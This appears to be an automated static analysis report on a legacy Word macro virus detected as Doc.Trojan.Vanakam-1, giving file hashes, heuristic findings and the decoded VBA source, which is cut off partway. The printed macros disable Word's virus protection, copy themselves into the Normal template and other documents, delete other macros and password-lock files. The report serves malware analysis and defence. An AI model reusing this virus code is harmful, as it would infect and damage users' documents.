Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f19c24ef6368231…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 45.0 KB
Created: 2000-04-19 04:04:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1b75cbba2467f850c9ca30fea304bcfe
SHA-1: 21e1c54cdc8161b161b83877cf0e51cae29bdccc
SHA-256: 5f19c24ef6368231d8abe15db1d4b0105c3da7af87eb85bfb51004490aeec2da
Risk score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample exhibits characteristics of a legacy macro virus, with both WordBasic and VBA macros detected. The presence of AutoOpen and Auto_Close macros, along with legacy WordBasic markers, suggests an attempt to infect other documents. The ClamAV detection as 'Doc.Trojan.Vanakam-1' further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.Vanakam-1 [severity: critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Vanakam-1
  • Legacy WordBasic macro-virus markers [severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [severity: medium; 2 related findings; rule: OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [severity: high; rule: OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Auto_Close macro [severity: high; rule: OLE_VBA_AUTOCLOSE]
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7433 bytes
SHA-256: 67aca8a8677c05fe78595dee4ffd90ba62a4179acc040583ea49a561b888c526
Detection
ClamAV: Doc.Trojan.Vanakam-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "MalaysianIndian"
Public sfile, dfile, MacroActive As Variant
Public infected, KillMacro, ReturnValue, foundDot, foundDoc As Boolean
Public myVirus(2) As String
Dim errormsg
Function MacroTrue()
    WordBasic.disableautomacros True
End Function
Function MacroFalse()
    WordBasic.disableautomacros False
End Function
Function AssignCode()
    myVirus(0) = "MalaysianIndian"
    myVirus(1) = "Indian"
    myVirus(2) = "IndianMsg"
End Function

Sub TransferMacro(SourceFile, DestinationFile)
    Dim TempMacro
    For Each TempMacro In myVirus
       Application.OrganizerCopy SourceFile.FullName, DestinationFile.FullName, TempMacro, 3
    Next TempMacro
End Sub

Function GetFile()
    MacroActive = MacroContainer
    Set dfile = ActiveDocument
    Set sfile = NormalTemplate
    
    If MacroActive = dfile Then
        Set sfile = dfile
        Set dfile = NormalTemplate
    Else
        Set sfile = NormalTemplate
        Set dfile = ActiveDocument
    End If
End Function

Function InsertFootNote()
    If ActiveDocument.ProtectionType = wdNoProtection Then
      With ActiveDocument.Sections(1)
        .Headers(wdHeaderFooterPrimary).Range.Text = "Indian 2000"
        .Footers(wdHeaderFooterPrimary).Range.Text = "Indian The Best"
      End With
    End If
End Function

Function CheckInfection(NeedFile) As Boolean
    Dim mv
    Dim Md
    
    For Each Md In NeedFile.VBProject.VBComponents
    If Md.Name <> "ThisDocument" And Md.Name <> "MalaysianIndian" And Md.Name <> "Indian" And Md.Name <> "IndianMsg" Then
       Application.OrganizerDelete NeedFile.FullName, Md.Name, 3
    End If
    Next Md
    
   For Each mv In NeedFile.VBProject.VBComponents
     If mv.Name = "MalaysianIndian" Then
       CheckInfection = True
       Exit Function
     End If
     If mv.Name <> "MalaysianIndian" Then
       CheckInfection = False
     End If
    Next mv
End Function
Function UnprotectDocument()
    If ActiveDocument.ProtectionType <> wdNoProtection Then
        ActiveDocument.Unprotect Password:="pascalline"
    End If
End Function
Function ProtectDocument()
    If ActiveDocument.ProtectionType = wdNoProtection Then
        WordBasic.ToolsProtectDocument DocumentPassword:="pascalline", NoReset:=1, Type:=1
    End If
End Function
Function InfectDeinfect(SourceDoc, DestinationDoc)
   AssignCode
   ReturnValue = CheckInfection(DestinationDoc)
   If ReturnValue <> True Then
      TransferMacro SourceDoc, DestinationDoc
   End If
End Function

Sub AutoNew()
On Error GoTo StopAutoNew
    InsertFootNote
StopAutoNew:
End Sub

Sub AutoClose()
On Error GoTo StopAutoClose
    Dim aClose
    Application.DisplayAlerts = -1
    Options.VirusProtection = False
    GetFile
    aClose = InfectDeinfect(sfile, dfile)
    If ActiveDocument.ReadOnly = False Then
        ProtectDocument
        WordBasic.FileSaveAs Format:=1
    End If
StopAutoClose:
End Sub
Sub AutoOpen()
On Error GoTo StopAutoOpen
    Dim aOpen
    GetFile
    aOpen = CheckInfection(sfile)
    If ActiveDocument.ProtectionType = wdNoProtection Then
        InsertFootNote
    End If
StopAutoOpen:
End Sub

Sub AutoExit()
On Error GoTo StopAutoExit
    Dim SearchObj As Object
    foundDot = False
    For Each SearchObj In AddIns
        If SearchObj.Name = "IndianTheBest.dot" Then foundDot = True
    Next SearchObj
    
    If foundDot <> True Then
        Application.Visible = False
        Documents.Add
        GetFile
        aClose = InfectDeinfect(sfile, dfile)
        With ActiveDocument
                .SaveAs FileName:=Options.DefaultFilePath(8) & "\IndianTheBest.src", fileformat:=wdFormatDocument, AddtoRecentFiles:=False
                .SaveAs FileName:=Options.DefaultFilePat
... (truncated)